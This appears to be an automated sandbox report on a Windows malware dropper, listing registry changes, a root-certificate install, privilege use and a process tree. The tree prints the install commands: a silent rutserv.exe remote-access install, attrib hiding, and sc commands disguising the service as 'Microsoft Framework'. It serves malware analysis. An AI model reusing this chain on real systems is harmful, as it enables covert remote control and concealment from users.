    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigrationMicrosoftEdge.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\CookiesMicrosoftEdge.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\InstanceDownloads.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charsetwinit.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settingscmd.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1"MicrosoftEdge.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\MigrationTime = 998267c856add601MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\CacheMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settingswini.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url5 = "https://twitter.com/"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrderMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible CacheMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigrationMicrosoftEdge.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigrationMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdgeMicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigrationMicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url3 = "https://signin.ebay.com/ws/ebayisapi.dll"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet SettingsMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000"MicrosoftEdge.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\HistoryMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\MIME\Databasewinit.exe
    Key created\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepagewinit.exe
    Set value (data)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1"MicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\DatabaseComplete = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet SettingsMicrosoftEdge.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1"MicrosoftEdge.exe
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\InstanceDownloads.exe
    Set value (int)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\AllComplete = "1"MicrosoftEdge.exe
  • Modifies system certificate store
    aliens.exe

    TTPs

    Install Root CertificateModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDDaliens.exe
    Set value (data)\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576aliens.exe
  • NTFS ADS
    taskhost.exeupdate.exeutorrent.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\ProgramData\Microsoft\Intel\winmgmts:\localhost\taskhost.exe
    File opened for modificationC:\Users\Admin\Desktop\WinMgmts:\update.exe
    File opened for modificationC:\Users\Admin\Desktop\WinMgmts:\utorrent.exe
  • Runs .reg file with regedit
    regedit.exeregedit.exe

    Reported IOCs

    pidprocess
    2596regedit.exe
    3948regedit.exe
  • Runs net.exe
  • Runs ping.exe
    PING.EXEPING.EXE

    TTPs

    Remote System Discovery

    Reported IOCs

    pidprocess
    5348PING.EXE
    4880PING.EXE
  • Suspicious behavior: AddClipboardFormatListener
    api.exe

    Reported IOCs

    pidprocess
    1620api.exe
  • Suspicious behavior: EnumeratesProcesses
    update.exerutserv.exerutserv.exerutserv.exerutserv.exewinit.exe

    Reported IOCs

    pidprocess
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    4028update.exe
    2108rutserv.exe
    2108rutserv.exe
    2108rutserv.exe
    2108rutserv.exe
    2108rutserv.exe
    2108rutserv.exe
    1628rutserv.exe
    1628rutserv.exe
    1276rutserv.exe
    1276rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    2228rutserv.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
    632winit.exe
  • Suspicious behavior: GetForegroundWindowSpam
    taskhostw.exetaskhost.exeapi.exe

    Reported IOCs

    pidprocess
    4964taskhostw.exe
    4244taskhost.exe
    1620api.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pidprocess
    612
    612
    612
  • Suspicious use of AdjustPrivilegeToken
    rutserv.exerutserv.exerutserv.exetaskkill.exetaskkill.exetaskkill.exeOnlineInstaller.exeOnlineInstaller.tmpAUDIODG.EXERDPWInst.exeRDPWinst.exesystem.exesvchost.exeapi.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege2108rutserv.exe
    Token: SeDebugPrivilege1276rutserv.exe
    Token: SeTakeOwnershipPrivilege2228rutserv.exe
    Token: SeTcbPrivilege2228rutserv.exe
    Token: SeTcbPrivilege2228rutserv.exe
    Token: SeDebugPrivilege4228taskkill.exe
    Token: SeDebugPrivilege2892taskkill.exe
    Token: SeDebugPrivilege4316taskkill.exe
    Token: SeDebugPrivilege4404OnlineInstaller.exe
    Token: SeLoadDriverPrivilege4404OnlineInstaller.exe
    Token: SeDebugPrivilege4856OnlineInstaller.tmp
    Token: SeLoadDriverPrivilege4856OnlineInstaller.tmp
    Token: 334780AUDIODG.EXE
    Token: SeIncBasePriorityPrivilege4780AUDIODG.EXE
    Token: SeDebugPrivilege1400RDPWInst.exe
    Token: SeDebugPrivilege4216RDPWinst.exe
    Token: SeDebugPrivilege4416system.exe
    Token: SeAuditPrivilege4580svchost.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeRestorePrivilege1620api.exe
    Token: SeTakeOwnershipPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
    Token: SeDebugPrivilege1620api.exe
  • Suspicious use of FindShellTrayWindow
    update.exeapi.exemsiexec.exe

    Reported IOCs

    pidprocess
    4932update.exe
    4932update.exe
    4932update.exe
    1620api.exe
    1620api.exe
    6020msiexec.exe
  • Suspicious use of SendNotifyMessage
    update.exeapi.exe

    Reported IOCs

    pidprocess
    4932update.exe
    4932update.exe
    4932update.exe
    1620api.exe
    1620api.exe
  • Suspicious use of SetWindowsHookEx
    Downloads.exeupdate.exewini.exewinit.exerutserv.exerutserv.exerutserv.exerutserv.execheat.exetaskhost.exeWinMail.exeWinMail.exetaskhostw.exeR8.exeutorrent.exeazur.exeupdate.exeapi.exeOnlineInstaller.exeOnlineInstaller.tmpRDPWinst.exe002.exeRDPWinst.exealiens.exeMicrosoftEdge.exe97535F5358BB4449.exe97535F5358BB4449.exefirefox.exe1605810348493.exefirefox.exe1605810353930.exefirefox.exe1605810359509.exefirefox.exe1605810362353.exe

    Reported IOCs

    pidprocess
    732Downloads.exe
    732Downloads.exe
    4028update.exe
    768wini.exe
    632winit.exe
    2108rutserv.exe
    1628rutserv.exe
    1276rutserv.exe
    2228rutserv.exe
    1200cheat.exe
    1712taskhost.exe
    4220WinMail.exe
    4192WinMail.exe
    4964taskhostw.exe
    4156R8.exe
    576utorrent.exe
    3548azur.exe
    4932update.exe
    1620api.exe
    1620api.exe
    4404OnlineInstaller.exe
    4856OnlineInstaller.tmp
    4216RDPWinst.exe
    5720002.exe
    5720002.exe
    5316RDPWinst.exe
    5192aliens.exe
    5408MicrosoftEdge.exe
    530497535F5358BB4449.exe
    537297535F5358BB4449.exe
    3312firefox.exe
    57241605810348493.exe
    5940firefox.exe
    56321605810353930.exe
    5424firefox.exe
    53921605810359509.exe
    4836firefox.exe
    59281605810362353.exe
  • Suspicious use of WriteProcessMemory
    update.exewini.exeWScript.execmd.execheat.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 4028 wrote to memory of 7684028update.exewini.exe
    PID 4028 wrote to memory of 7684028update.exewini.exe
    PID 4028 wrote to memory of 7684028update.exewini.exe
    PID 768 wrote to memory of 3696768wini.exeWScript.exe
    PID 768 wrote to memory of 3696768wini.exeWScript.exe
    PID 768 wrote to memory of 3696768wini.exeWScript.exe
    PID 768 wrote to memory of 632768wini.exewinit.exe
    PID 768 wrote to memory of 632768wini.exewinit.exe
    PID 768 wrote to memory of 632768wini.exewinit.exe
    PID 3696 wrote to memory of 22803696WScript.execmd.exe
    PID 3696 wrote to memory of 22803696WScript.execmd.exe
    PID 3696 wrote to memory of 22803696WScript.execmd.exe
    PID 2280 wrote to memory of 25962280cmd.exeregedit.exe
    PID 2280 wrote to memory of 25962280cmd.exeregedit.exe
    PID 2280 wrote to memory of 25962280cmd.exeregedit.exe
    PID 2280 wrote to memory of 39482280cmd.exeregedit.exe
    PID 2280 wrote to memory of 39482280cmd.exeregedit.exe
    PID 2280 wrote to memory of 39482280cmd.exeregedit.exe
    PID 2280 wrote to memory of 21642280cmd.exetimeout.exe
    PID 2280 wrote to memory of 21642280cmd.exetimeout.exe
    PID 2280 wrote to memory of 21642280cmd.exetimeout.exe
    PID 2280 wrote to memory of 21082280cmd.exerutserv.exe
    PID 2280 wrote to memory of 21082280cmd.exerutserv.exe
    PID 2280 wrote to memory of 21082280cmd.exerutserv.exe
    PID 2280 wrote to memory of 16282280cmd.exerutserv.exe
    PID 2280 wrote to memory of 16282280cmd.exerutserv.exe
    PID 2280 wrote to memory of 16282280cmd.exerutserv.exe
    PID 2280 wrote to memory of 12762280cmd.exerutserv.exe
    PID 2280 wrote to memory of 12762280cmd.exerutserv.exe
    PID 2280 wrote to memory of 12762280cmd.exerutserv.exe
    PID 4028 wrote to memory of 12004028update.execheat.exe
    PID 4028 wrote to memory of 12004028update.execheat.exe
    PID 4028 wrote to memory of 12004028update.execheat.exe
    PID 2280 wrote to memory of 9962280cmd.exeattrib.exe
    PID 2280 wrote to memory of 9962280cmd.exeattrib.exe
    PID 2280 wrote to memory of 9962280cmd.exeattrib.exe
    PID 4028 wrote to memory of 12084028update.exeschtasks.exe
    PID 4028 wrote to memory of 12084028update.exeschtasks.exe
    PID 4028 wrote to memory of 12084028update.exeschtasks.exe
    PID 2280 wrote to memory of 16242280cmd.exeattrib.exe
    PID 2280 wrote to memory of 16242280cmd.exeattrib.exe
    PID 2280 wrote to memory of 16242280cmd.exeattrib.exe
    PID 4028 wrote to memory of 28964028update.exeschtasks.exe
    PID 4028 wrote to memory of 28964028update.exeschtasks.exe
    PID 4028 wrote to memory of 28964028update.exeschtasks.exe
    PID 2280 wrote to memory of 24562280cmd.exesc.exe
    PID 2280 wrote to memory of 24562280cmd.exesc.exe
    PID 2280 wrote to memory of 24562280cmd.exesc.exe
    PID 1200 wrote to memory of 17121200cheat.exetaskhost.exe
    PID 1200 wrote to memory of 17121200cheat.exetaskhost.exe
    PID 1200 wrote to memory of 17121200cheat.exetaskhost.exe
    PID 2280 wrote to memory of 13442280cmd.exesc.exe
    PID 2280 wrote to memory of 13442280cmd.exesc.exe
    PID 2280 wrote to memory of 13442280cmd.exesc.exe
    PID 4028 wrote to memory of 10804028update.exeschtasks.exe
    PID 4028 wrote to memory of 10804028update.exeschtasks.exe
    PID 4028 wrote to memory of 10804028update.exeschtasks.exe
    PID 2280 wrote to memory of 642280cmd.exesc.exe
    PID 2280 wrote to memory of 642280cmd.exesc.exe
    PID 2280 wrote to memory of 642280cmd.exesc.exe
    PID 4028 wrote to memory of 25324028update.exeschtasks.exe
    PID 4028 wrote to memory of 25324028update.exeschtasks.exe
    PID 4028 wrote to memory of 25324028update.exeschtasks.exe
    PID 4028 wrote to memory of 38284028update.execmd.exe
  • Views/modifies file attributes
    attrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

    Tags

    TTPs

    Hidden Files and Directories

    Reported IOCs

    pidprocess
    996attrib.exe
    1624attrib.exe
    5476attrib.exe
    5168attrib.exe
    4576attrib.exe
Processes 289
  • C:\Users\Admin\AppData\Local\Temp\Downloads.exe
    "C:\Users\Admin\AppData\Local\Temp\Downloads.exe"
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:732
  • C:\Users\Admin\Desktop\update.exe
    "C:\Users\Admin\Desktop\update.exe"
    Drops file in Drivers directory
    Executes dropped EXE
    Modifies WinLogon
    Drops file in Program Files directory
    NTFS ADS
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:4028
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      Executes dropped EXE
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:768
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          Suspicious use of WriteProcessMemory
          PID:2280
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            Runs .reg file with regedit
            PID:2596
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            Runs .reg file with regedit
            PID:3948
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            Delays execution with timeout.exe
            PID:2164
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:2108
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of SetWindowsHookEx
            PID:1628
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            Executes dropped EXE
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            Suspicious use of SetWindowsHookEx
            PID:1276
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            Views/modifies file attributes
            PID:996
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            Views/modifies file attributes
            PID:1624
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            PID:2456
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService obj= LocalSystem type= interact type= own
            PID:1344
          • C:\Windows\SysWOW64\sc.exe
            sc config RManService DisplayName= "Microsoft Framework"
            PID:64
      • C:\ProgramData\Windows\winit.exe
        "C:\ProgramData\Windows\winit.exe"
        Executes dropped EXE
        Checks processor information in registry
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        PID:632
        • C:\Program Files (x86)\Windows Mail\WinMail.exe
          "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
          Suspicious use of SetWindowsHookEx
          PID:4220
          • C:\Program Files\Windows Mail\WinMail.exe
            "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
            Suspicious use of SetWindowsHookEx
            PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
          PID:4336
          • C:\Windows\SysWOW64\timeout.exe
            timeout 5
            Delays execution with timeout.exe
            PID:4528
    • C:\programdata\install\cheat.exe
      C:\programdata\install\cheat.exe -pnaxui
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1200
      • C:\ProgramData\Microsoft\Intel\taskhost.exe
        "C:\ProgramData\Microsoft\Intel\taskhost.exe"
        Executes dropped EXE
        NTFS ADS
